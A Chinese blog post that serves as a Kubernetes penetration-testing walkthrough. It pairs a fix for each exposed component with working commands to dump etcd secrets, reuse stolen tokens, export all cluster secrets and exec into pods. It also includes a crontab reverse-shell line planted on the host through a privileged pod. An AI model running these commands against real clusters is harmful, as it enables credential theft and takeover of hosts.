Kubernetes(k8s)集群渗透

已于 2022-08-27 23:18:05 修改
阅读量1.7k 收藏 3
点赞数 2
分类专栏: 内网渗透 文章标签: kubernetes docker 容器
于 2022-08-27 23:17:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253622/article/details/126563876
版权

一、简介

Kubernetes,又称为 k8s,是一种可自动实施Linux容器操作的开源平台,可以帮助用户省去应用容器化过程的许多手动部署和扩展操作,也就是说,它可以将运行 Linux 容器的多组主机聚集在一起并轻松高效地管理这些集群。

二、优势

  • 服务发现与调度

  • 负载均衡

  • 服务自愈

  • 服务弹性扩容

  • 横向扩容

  • 存储卷挂载

三、相关术语

主机(Master): 用于控制 Kubernetes 节点的计算机。所有任务分配都来自于此。

节点(Node):负责执行请求和所分配任务的计算机。由 Kubernetes 主机负责对节点进行控制。

容器集(Pod):被部署在单个节点上的,且包含一个或多个容器的容器组。同一容器集中的所有容器共享同一个 IP 地址、IPC、主机名称及其它资源。容器集会将网络和存储从底层容器中抽象出来。这样,就能更加轻松地在集群中移动容器。

复制控制器(Replication controller):用于控制应在集群某处运行的完全相同的容器集副本数量。

服务(Service):将工作内容与容器集分离。Kubernetes 服务代理会自动将服务请求分发到正确的容器集——无论这个容器集会移到集群中的哪个位置,甚至可以被替换掉。

Kubelet:运行在节点上的服务,可读取容器清单(container manifest),确保指定的容器启动并运行。

kubectl: Kubernetes 的命令行配置工具

四、架构

架构图: 

k8s集群由Master节点和Node(Worker)节点组成

Master节点(主节点)

Master节点指的是集群控制节点,管理和控制整个集群,基本上k8s的所有控制命令都发给它,它负责具体的执⾏过程。在Master上主要运⾏着:

  1. Kubernetes Controller Manager(kube-controller-manager):k8s中所有资源对象的⾃动化控制中⼼,维护管理集群的状态,⽐如故障检测,⾃动扩展,滚动更新等,管理控制器。

  2. Kubernetes Scheduler(kube-scheduler): 负责资源调度,按照预定的调度策略将Pod调度到相应的机器上,“调度室”。

  3. etcd:保存整个集群的状态。

Node节点(计算节点)

除了master以外的节点被称为Node或者Worker节点,可以在master中使⽤命令 kubectl get nodes查看集群中的node节点。每个Node都会被Master分配⼀些⼯作负载(Docker容器),当某个Node宕机时,该节点上的⼯作负载就会被Master⾃动转移到其它节点上。在Node上主要运⾏着:

  1. kubelet:负责Pod对应的容器的创建、启停、修改、删除等任务,同时与Master密切协作,实现集群管理的基本功能。

  2. kube-proxy:实现service的通信与负载均衡,提供代理。

  3. docker(Docker Engine):Docker引擎,负责本机的容器创建和管理

  4. Pod:是k8s最基本的操作单元。一个Pod代表着集群中运行的一个进程,它内部封装了一个或多个紧密相关的容器。

  5. Fluentd:主要负责日志收集、存储与查询。


 

五、风险面

k8s集群主要由以下组件组成:

1)kube-apiserver:k8s master节点api服务器,以REST API服务形式提供接⼝,作为整个k8s的控制⼊⼝。

2)kube-controller-manager:执⾏整个k8s的后台任务,包括节点状态状况、Pod个数、Pods和Service的关联等。

3)kube-scheduler:接收来⾃kube-apiserver创建Pods任务,通过收集的集群中所有node节点的资源负载情况分配到某个节点。

4)etcd:k8s的键值对形式数据库,保存了k8s所有集群数据的后台数据库

5)kube-proxy:运⾏在每个node节点上,负责pod⽹络代理。定时从etcd获取到service信息来做相应的策略。

6)kubelet:运⾏在每个node节点上,作为agent,接收分配该节点的pods任务及管理容器,周期性获取容器状态,反馈给kube-apiserver

漏洞点主要是在上面提到的重点组件内:

kube-apiserver、kubelet、etcd、dashboard、docker、kube-proxy

组件

常用端口

脆弱点

备注

kube-apiserver

6443、8080

未授权访问

节点API服务器

kubelet

10250(https)、10255

未授权访问

etcd

2379

未授权访问

数据库

docker

2375

未授权访问

dashboard

30000+

认证绕过CVE-2018-18264

未授权

k8s的Web管理接口:未做鉴权,直接操作集群

kube-proxy

配置错误

cadvisor(k8s的监控)

4194、8080

未授权

利用细节

etcd - 未授权访问

etcd是⼀个key-value数据库,为k8s集群提供底层数据存储。

未授权访问:数据库敏感内容若无加密处理,会被攻击者加以利用,甚至控制整个集群

修复建议:通过 --client-cert-auth 开启证书校验,开启访问控制

#检测利用 
http://IP:2379/version	
http://IP:2379/v2/keys			#有v2和v3两个版本
http://0.0.0.0:2379/v2/keys/?recursive=true

etcdctl 工具地址

ETCDCTL_API=3 ./etcdctl --endpoints=http://IP:2379/ get / --prefix --keys-only		#遍历所有的key

ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://IP:2379/ get / --prefix --keys-only			# --insecure-transport --insecure-skip-tls-verify 忽略证书校验

ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://IP:2379/ get / --prefix --keys-only | sort |
uniq | xargs -I{} sh -c 'ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://IP:2379
get {} >> output.data && echo "" >> output.data'  
#通过v3 API来dump数据库到 output.data(输出格式:一行key+一行value)

ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://IP:2379/ get / --prefix --keys-only|sort|uniq|
grep secret		#	查找secret相关keys
# 通过 get /registry/secrets/default/admin-token-557l2 拿到 token

dump下etcd,定位 apiserver 和 所有证书;  检索关键字 advertiseAddress | kubeAPIConfig 定位 apiserver的地址

使用curl 访问api server,确认token是否正确可用;

curl --header "Authorization: Bearer TOKEN" -X GET https://API_SERVER:6443/api -k

token错误,返回401

{ "kind": "Status", "apiVersion": "v1", "metadata": {}, "status": "Failure", "message": "Unauthorized", "reason":"Unauthorized", "code": 401}

token正确,返回

{ "kind": "APIVersions", "versions": [ "v1" ],"serverAddressByClientCIDRs": [ { "clientCIDR": "xxxx", "serverAddress":"xxxx" } ]}

执⾏kubectl config命令,来⽣成简单的临时配置⽂件

touch test_config kubectl --kubeconfig=./test_config config set-credentials hacker --token=TOKENkubectl --kubeconfig=./test_config config
set-cluster hacked_cluster --server=https://IP:6443/  --insecure-skip-tls-verifykubectl --kubeconfig=./test_config config set-context
test_context --cluster=hacked_cluster --user=hackerkubectl --
kubeconfig=./test_config config use-context test_context		# 生成临时配置文件

通过该配置文件访问api server,达到控制k8s集群的目标:

brew install kubectl    #	mac安装kubectl

kubectl --kubeconfig=./test_config get nodes -A		#管控集群

扩大权限,使用kubectl 导出所有secret,利用优于etcd

kubectl --kubeconfig=./test_config get secret -A -o custom-columns=:.metadata.name,:.metadata.namespace --no-headers | xargs -n 2 sh
-c '(kubectl --kubeconfig=./test_config get secret -n $3 -o yaml $2; echo
"") >> all_secrets_yaml.txt' -- {}

Kube apiserver - 未授权访问

k8s api server 存在未授权访问,攻击者可通过kubectl创建恶意pod或控制已有pod,后续可逃逸至宿主机

修复建议:使用安全端口替代8080端口,并使用 --tls-cert-file参数

直接访问:http://ip:port/,回显接口信息

访问 http://ip:8080/api/v1/namespaces/kube-system/secrets/ 拿到token

创建kubectl配置⽂件,指定⽬标地址和拿到的token等

kubectl--kubeconfig=./test_config get pod -n kube-system -o wide

# 通过kubectl使⽤kube-system的token获取pod列表。之后可进⼀步创建pod或控制已有pod进⾏命令执⾏等操作
curl –insecure -v -H “X-Stream-Protocol-Version: v2.channel.k8s.io” -H “X-Stream-Protocol-Version: channel.k8s.io” -X POST “https://IP:10250/exec/namespace/podID/containername? command=touch&command=/tmp/test&input=1&output=1&tty=1"

kubectl -s ip:8080 get node # 获取节点
kubectl -s 127.0.0.1:8080 get pods # 获取Pods
kubectl -s 127.0.0.1:8080 --namespace=default exec -it nginxfromuzju-
59595f6ffc-p8xvk bash	#执行命令

PS:较高版本的k8s,需要获取service-account-token,通过访问api来获取token

/api/v1/namespaces/kube-system/secrets/

获取宿主机权限-通过k8s dashboard,创建特权Pods

echo -e "* * * * * /bin/bash -i >& /dev/tcp/0.0.0.0/1234 0>&1" >> /mnt/etc/crontab
# 然后通过dashboard创建pod并挂在宿主机的任意⽬录;然后写crontab获取shell

Kubelet - 未授权访问

k8s node对外开启10250(kubelet API)和10255端⼝(readonly API),攻击者可创建恶意pod或控制已有pod,后续可尝试逃逸⾄宿主机

修复建议:

  1. readOnlyPort=0:关闭只读端⼝(默认 10255);

  2. authentication.anonymous.enabled:设置为 false,不允许匿名访问 10250 端⼝;

  3. authentication.x509.clientCAFile:指定签名客户端证书的 CA 证书,开启 HTTP 证书认证;authentication.webhook.enabled=true:开启 HTTPs bearer token 认证

curl http://ip:10250/pods

使用kubeletctl 批量获取pod等信息:

./kubeletctl pods -s x.x.x.x

可使⽤kubeletctl在特权pod内执⾏命令,挂载宿主机根⽬录,通过向宿主机批量写⼊ssh公钥逃逸到宿主机

k8s dashboard认证绕过(CVE-2018-18264)

攻击者可跳过登录,直接进⼊dashboard web⻚获取pod和job等状态,并可创建恶意pod,尝试逃逸⾄宿主机

修复建议:关闭dashboard的--enable-skip-login

登录页面选择跳过登录 -> 可通过dashboard获取pod、node和job等状态

若业务配置错误或为了⽅便给 Kubernetes dashboard 绑定 cluster-admin等⻆⾊,攻击者可直接在界⾯上创建特权 pod 进⾏容器逃逸

docker - 未授权访问

攻击者可利用对外暴露的docker remote api,执行docker命令

修复建议:⽣成证书进⾏api校验:docker -d --tlsverify --tlscacert=ca.pem--tlscert=server-cert.pem--tlskey=server-key.pem-H=tcp://x.x.x.x:2375-H unix:///var/run/dock

curl http://ip:2376/version		#可获取docker版本等信息

通过调用docker未授权接口,创建特权容器,挂载宿主机根目录;后续可通过写入ssh公钥和crontab等,完成逃逸和持久化

kube proxy 配置错误

攻击者可通过kube-proxy代理来未授权访问本地kube-apiserver组件,创建恶意pod或控制已有pod,后续可尝试逃逸⾄宿主机

修复建议:kube-proxy禁⽌对外直接使⽤--address=0.0.0.0参数

该漏洞⼀般为业务或开发为了⽅便,通过kubectl proxy --address=0.0.0.0命令,将kube-apiserver暴露到0.0.0.0,且默认未授权之后请求8001端⼝即可未授权访问kube-apiserver;后续可按照kube-apiserver未授权进行处理。

仅供学习使用!!

参考

什么是Kubernetes (Kube) ? 一文了解K8s是什么_红帽

k8s架构与组件详解 - 知乎

什么是K8S - 知乎

K8s简介之什么是K8s

https://copyfuture.com/blogs-details/20210616193408465N

k8s对外攻击面总结 - 哔哩哔哩

10分钟看懂Docker和K8S_Seven7707的博客-CSDN博客

carefree798
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
K8s集群安全攻防(上)
hackzkaq的博客
01-19 570
在打攻防演练的时候偶尔会遇到目标内网资产采用集群化部署的情况(GuoQi偏多),在这种情况下由于刷分需求就需要对集群进行攻击测试以争取控制整个集群,本篇文章将从K8s的基本概念、主要组件、架构和安全评估测试方法等维度对K8s的安全进行系统性介绍。
渗透入侵\K8飞刀.zip
07-15
"K8飞刀"在这个语境下,很可能是指一款专门针对Kubernetes(简称K8s)环境进行渗透测试的工具或技术。Kubernetes是Google开源的容器编排系统,它在云原生应用部署和管理中扮演着重要角色。由于其广泛的应用,安全...
K8S云原生环境渗透学习
weixin_50464560的博客
05-15 1418
转载至​​​​​​K8S云原生环境渗透学习 - 先知社区 K8S云原生环境渗透学习 前言 ​ Kubernetes,简称k8s,是当前主流的容器调度平台,被称为云原生时代的操作系统。在实际项目也经常发现厂商部署了使用k8s进行管理的云原生架构环境,在目前全面上云的趋势,有必要学习在k8s环境的下的一些攻击手法。 k8s用户 Kubernetes 集群中包含两类用户:一类是由 Kubernetes管理的service account,另一类是普通用户。 service account 是由
探索Kubeletctl:Kubernetes管理的利器
最新发布
gitblog_00038的博客
05-18 258
探索Kubeletctl:Kubernetes管理的利器 项目地址:https://gitcode.com/cyberark/kubeletctl 在复杂的Kubernetes环境中,有效管理和操控节点有时可能变得困难。这就是Kubeletctl大展身手的地方,这是一个强大的命令行工具,它提供了对Kubelet全方位的访问和控制。无论你是集群管理员还是开发人员,Kubeletctl都会成为你日常运...
K8S云原生渗透实战
Y7472821的博客
10-26 322
Kubernetes是一个开源的,用于管理云平台中多个主机上的容器化的应用,Kubernetes的目标是让部署容器化的应用简单并且高效(powerful),Kubernetes提供了应用部署,规划,更新,维护的一种机制。如今,很多云原生产品,都是在k8s上进行微创新。云上攻防就是研究k8s漏洞。此次实战渗透k8s云原生产品,分享经验心得。
K8S云原生渗透实战99
y473158Yansu的博客
10-21 93
Kubernetes是一个开源的,用于管理云平台中多个主机上的容器化的应用,Kubernetes的目标是让部署容器化的应用简单并且高效(powerful),Kubernetes提供了应用部署,规划,更新,维护的一种机制。如今,很多云原生产品,都是在k8s上进行微创新。云上攻防就是研究k8s漏洞。此次实战渗透k8s云原生产品,分享经验心得。
k8s图形界面登录报错Failure
mandarin_meng的博客
09-20 598
使用client-certificate-data和client-key-data生成一个p12文件。然后关闭浏览器,重新登录后通过token登录就可以了。生成client-certificate-data。下面是Chrome和Firefox浏览器导入证书。kubecfg.p12就是生成的个人证书。生成client-key-data。k8s图形界面登录报错如下。
k8s做注册中心和负载均衡的时候无法拉取服务列表的问题
ygreatred的博客
03-04 1205
记录一个bug:目前很多服务使用k8s作为注册中心和负载均衡中间件。但是在项目使用中,会出现一个问题。服务运行一段时间之后,会出现无法获取k8s上服务列表的bug,返回403
k0otkit:针对K8s集群的通用后渗透控制技术.pdf
08-11
Kubernetes(通常简称为K8s)是一个开源的自动化系统,用于管理和扩展容器化的应用程序。它能够处理应用的部署、扩展以及运行时的管理,确保服务的高可用性和容错性。Kubernetes的核心组件包括API服务器、etcd、控制...
Kubernetes集群渗透-攻击者视角中的Kubernetes.pdf
09-10
从攻击者角度看,针对K8s集群渗透可能包括以下步骤: 1. **初始立足点**:通过识别和利用网络漏洞,攻击者可能获得对集群内某Pod的访问。 2. **横向移动**:利用命名空间隔离的缺陷,攻击者可能在不同命名空间间...
kubeletmein:Kubernetes的安全测试工具,在公共云提供商上滥用kubelet凭据
03-11
这是一个简单的渗透测试工具,利用公共云提供程序的方法为Kubernetes集群中的节点提供kubelet凭据,以便获得对k8s API的特权访问。 然后,这种访问可能会被用来进一步破坏集群中运行的应用程序,或者在许多情况下,...
k0otkit:以K8s方式操纵K8
05-28
k0otkit-以K8s方式操纵K8s 介绍 k0otkit是一种通用的渗透后技术,可用于针对Kubernetes集群渗透。 使用k0otkit,您可以快速,隐蔽和连续地(反向shell)操作目标Kubernetes集群中的所有节点。 k0otkit是...
Kubernetes 集群部署–所遇到的问题
happyzwh的专栏
01-11 4221
          查看dashboard界面 访问以下链接(1.8.3访问 https://masterip:6443/ui 无法访问): https://MasterIP:6443/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ 当然这个链接是怎么来的? [root@ma...
Kubernetes&K8s安全及渗透
qq_45087791的博客
03-26 1158
Kubernetes是一个开源的,用于编排云平台中多个主机上的容器化的应用,目标是让部署容器化的应用能简单并且高效的使用, 提供了应用部署,规划,更新,维护的一种机制。其核心的特点就是能够自主的管理容器来保证云平台中的容器按照用户的期望状态运行着,管理员可以加载一个微型服务,让规划器来找到合适的位置,同时,Kubernetes在系统提升工具以及人性化方面,让用户能够方便的部署自己的应用。1、Master节点2、Node节点3、Pod。
使用kube-proxy让外部网络访问K8S service的ClusterIP
weixin_34365635的博客
03-08 325
2019独角兽企业重金招聘Python工程师标准>>> ...
Kubernetes身份认证和授权操作全攻略:访问控制之Service Account
Rancher
09-06 871
这是本系列的最后一篇文章,前面我们了解了访问控制中的基本概念以及身份认证和授权的具体操作,本文我们将进一步了解访问控制中的service account。 Kubernetes中有用户和service account的概念,可用于访问资源。用户与密钥和证书相关联用于验证API请求,使用其中一个配置方案对在集群外部发起的任何请求进行身份验证。最常见的方案是通过X.509证书进行身份认证请求。有关创建...
解决k8s访问报anonymous cannot get path的问题
热门推荐
云深海阔专栏
06-01 1万+
k8s图形界面登录报错如下 { "kind": "Status", "apiVersion": "v1", "metadata": { }, "status": "Failure", "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"", "reason": "Forbidden", "details": { }, "code": 403 } 证书问题,
K8S渗透横向节点与持久化隐蔽方式探索
qq_18209847的博客
01-12 468
通过前文探索,对于较为的隐蔽的ns可以利用kube-system,在该ns下kube-proxy又是特别好拿来利用的,他本身就是DaemonSet在每一个节点上都有一Pod,并且是每一个集群最基本默认就存在的,并且经过测试,该Pod使用的环境中虽然条件苛刻,但是自带perl可以用来反弹,并且该Pod默认开启了多项Linux Capabilities可以直接逃逸到宿主机。根据对Lease研究知道,首先这个东西起码要可以执行命令,通过继续对Kubernetes的不断探索,发现了一个叫做容器探针的东西。
如何在Kubernetes中暴露服务访问
weixin_34001430的博客
01-03 1080
Kubernetes概述 最近的一年,kubernetes的发展如此闪耀,正被越来越多的公司采纳用于生产环境的实践。同时,我们可以在最著名的开发者问答社区StackOverflow上看到k8s的问题数量的增长曲线(2015.5-2016.5),开发者是用脚投票的,从这一点看也无疑证明了k8s的火爆程度。 k8s来源于Google生产环境...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

carefree798

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值